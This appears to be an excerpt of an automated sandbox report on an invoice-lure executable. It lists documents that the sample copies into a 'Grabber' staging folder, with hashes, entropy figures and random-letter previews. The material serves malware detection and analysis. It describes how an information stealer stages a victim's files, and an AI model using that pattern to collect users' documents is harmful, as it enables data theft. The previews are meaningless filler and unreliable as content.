Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.3.....

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\DTBZGIOOSO.docx

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.705615236042988
Encrypted:	false
SSDEEP:	24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
MD5:	159C7BA9D193731A3AAE589183A63B3F
SHA1:	81FDFC9C96C5B4F9C7730127B166B778092F114A
SHA-256:	1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
SHA-512:	2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
Malicious:	false
Preview:	DTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXDIHNWDDQDHPSAKZRRXOFYYXZWQWZFESELWVMUIBHMCLVZP

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\DTBZGIOOSO\DTBZGIOOSO.docx

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.705615236042988
Encrypted:	false
SSDEEP:	24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
MD5:	159C7BA9D193731A3AAE589183A63B3F
SHA1:	81FDFC9C96C5B4F9C7730127B166B778092F114A
SHA-256:	1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
SHA-512:	2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
Malicious:	false
Preview:	DTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXDIHNWDDQDHPSAKZRRXOFYYXZWQWZFESELWVMUIBHMCLVZP

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\DTBZGIOOSO\ONBQCLYSPU.pdf

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\DTBZGIOOSO\UMMBDNEQBN.png

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\DTBZGIOOSO\VLZDGUKUTZ.jpg

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\DTBZGIOOSO\XZXHAVGRAG.xlsx

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:	24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\DVWHKMNFNN.jpg

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694985340190863
Encrypted:	false
SSDEEP:	24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
MD5:	C9386BC43BF8FA274422EB8AC6BAE1A9
SHA1:	2CBDE59ADA19F0389A4C482667EC370D68F51049
SHA-256:	F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
SHA-512:	7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
Malicious:	false
Preview:	DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\KATAXZVCPS.pdf

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\KATAXZVCPS.xlsx

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\LTKMYBSEYZ.pdf

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687722658485212
Encrypted:	false
SSDEEP:	24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
MD5:	9A59DF7A478E34FB1DD60514E5C85366
SHA1:	DE10B95426671A161E37E5CE1AD6424AB3C07D98
SHA-256:	582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
SHA-512:	70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
Malicious:	false
Preview:	LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

